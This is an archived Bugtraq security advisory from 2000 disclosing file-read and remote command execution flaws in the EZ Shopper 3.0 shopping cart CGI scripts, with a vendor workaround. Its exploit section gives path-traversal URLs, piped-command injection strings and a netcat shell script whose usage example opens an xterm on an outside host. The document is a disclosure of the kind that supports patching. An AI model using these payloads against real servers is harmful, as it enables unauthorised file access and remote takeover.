Home page logo
/

bugtraq logo Bugtraq mailing list archives

EZ Shopper 3.0 shopping cart CGI remote command execution
From: suid () SUID KG (suid () SUID KG)
Date: Sun Feb 27 09:05:41 2000


suid () suid kg - EZ Shopper 3.0 remote command execution.

Software:       EZ Shopper 3.0  
URL:            http://www.ahg.com/software.htm#ezshopper
Version:        Version 3.0
Platforms:      Unix, NT
Type:           CGI, Input validation problem
Vendor status:  Notified 26/02/2000
Date:           26/02/2000

Summary:

        Anyone can execute any command on the remote system with
        the priveleges of the web server. Anyone can read any file
        on the remote system which the webserver has access to.

Vulnerability:

        The perl code does no input validation and performs an
        open() on a user supplied input.

Exploit:

        (1) loadpage.cgi - view any file.

        Firstly using your web browser find the current path (cwd):

                http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ

        You will receive an error message like:

                Cannot open file /home/www/shop/XYZ

        Now simply use (example based on the above cwd):

                http://www.example.com/cgi-bin/loadpage.cgi?
user_id=1&file=../../<path>/<file>

        (2) loadpage.cgi - execute any command.

        This example shell script uses netcat to communicate with a
        HTTP proxy and exploit the script:

        ------------------------CUT------------------------

        #!/bin/bash
        echo -e "GET http://www.example.com/cgi-bin/loadpage.cgi?
user_id=1&file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080

        ------------------------CUT------------------------

        A usage example would be:

                $ ./ezhack.sh /usr/X11R6/bin/xterm%20-display%
20123.123.123.123:0
                
        (3) search.cgi - view files (retarded tho) and execute commands.

        Simply replace the database field with piped commands or path/filename.

                http://www.example.com/cgi-bin/search.cgi?
user_id=1&database=<insert here>&template=<or insert here>&distinct=1           

        Note if you use the database field a valid template is probably needed
        and vice versa. 

Workaround:

        The vendor, AHG Inc, has released a fixed version, download it from
        their website and install the fixed version.

Greets:

        yowie
        cr
        active
        
http://www.suid.kg/advisories/010.txt

EOF


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault